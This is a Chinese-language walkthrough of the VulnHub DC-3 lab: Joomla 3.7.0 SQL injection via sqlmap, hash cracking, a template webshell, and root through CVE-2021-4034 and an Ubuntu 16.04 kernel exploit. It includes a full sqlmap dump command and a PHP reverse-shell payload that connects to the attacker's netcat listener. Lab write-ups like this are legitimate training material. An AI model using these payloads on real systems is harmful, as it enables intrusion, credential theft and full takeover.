写在前面
靶场链接:
https://www.vulnhub.com/entry/dc-32,312/
有些知识点在DC:1
中提到,可以翻阅
DC:1
注意该靶场仅需获取唯一FLAG。(需提权至root)
开启时,有一个连接设备的报错(VMware
),像如下修改即可,修改DC_3.vmx
信息搜集
扫描c
段,这里115
是攻击机,159
是靶机,141
为物理机,61
为网关
端口扫描,查到80
端口
进入,看到网页
指纹识别出是joomla CMS
MSF
使用msf
搜索是否有现成的,这里搜查到不少检测模块和入侵模块
继续信息收集,确定poc
范围,查找scanner
有好几个,这里我都试了试
这里暴力枚举登录,但是并未成功
gallerywd
扫描没出东西
page
枚举,也仅仅发现很少的网页
插件扫描,可以看到有一些sql
注入的点
版本扫描,查到版本为3.7.0
有了上述的信息,我们可以更进一步,更加具体的打poc
,3.7
有大量SQL
注入
第二个版本号吻合,查看该poc
,调sqlmap
使用该命令,查到mysql
版本,数据库
指定 joomladb
数据库,查表
显然有一个 #__users
表,大概率有敏感信息,指定该表,查到列
显然,这里有敏感列名,使用以下payload
dump
出数据
sqlmap -u "http://192.168.201.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T \#__users -C "username,password" --dump
得到密码hash
值
使用john
爆破,注意这里首先将密文存储为文件,爆破出密码为snoopy
使用用户密码登录,注意是登录后台 /administrator
在模板文件中注入木马
蚁剑连接
Pkexec 提权
连接进来,首先查看suid
文件,准备suid
提权。这里其实并没有太大的发现,suid
文件比较常规。但是由于不久前出的pwnkit
巨大漏洞,几乎对以前版本的pkexe
c是通杀,首先可以测一下pkexec
漏洞
poc
地址
https://github.com/berdav/CVE-2021-4034
CVE-2021-4034
在这里不做讲解,仅作利用,使用这个漏洞可以直接获得root
权限
通过蚁剑上传文件,非常方便
编译并执行poc
探测出易受该漏洞攻击,准备使用这个提权。由于蚁剑的虚拟终端并不是持久性的,它是通过命令执行模拟的,(提权后需要持续性交互)所以这里先反弹一个shell
出来。
借鉴的其他同学的payload
,适用于php
,保存后前往主页即可触发
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.201.115 2333 >/tmp/f');
?>
攻击机监听后弹回shell
执行漏洞poc
,直接获取root
权限
得到flag
ubuntu 16.04提权
较老的方法,也是本题的大多数解法,这里,首先信息收集内核,版本等等信息,是ubuntu 16.04
在expdb
中查找是否含有该版本的poc
,发现是有的,那个centos 7
非常符合
打开poc
,找到exp
下载地址
下载地址如下
https://bugs.chromium.org/p/project-zero/issues/detail?id=808
下载完毕后上传该poc
至被害主机中
解压
编译后运行
./compile.sh
./doubleput
提权成功,找到flag
文件